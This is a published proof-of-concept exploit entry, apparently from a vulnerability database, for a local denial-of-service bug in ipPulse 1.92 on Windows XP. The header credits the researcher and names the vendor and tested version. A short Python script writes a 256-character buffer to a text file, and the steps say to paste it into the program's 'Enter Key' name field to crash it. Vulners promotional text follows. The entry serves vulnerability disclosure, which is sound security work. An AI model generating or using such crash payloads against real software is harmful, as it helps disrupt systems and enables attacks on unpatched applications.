`# Exploit Title : ipPulse 1.92 "Enter Key 'Name' - Denial of Service" [POC]
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : [email protected]
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovery Date : 2018-07-30
# Vendor Homepage : https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version : 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS : Windows xp Service pack3 x86
# Steps to Reproduce:
# Run the python exploit.py , Open exploit.txt and copy content.
# Open ippulse.exe , Click On "Enter Key".
# In the name field paste the content of "exploit.txt" and in Key type anything.
# Press "OK" and B00m Crashed.
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("exploit.txt", "w")
f.write(buffer)
f.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation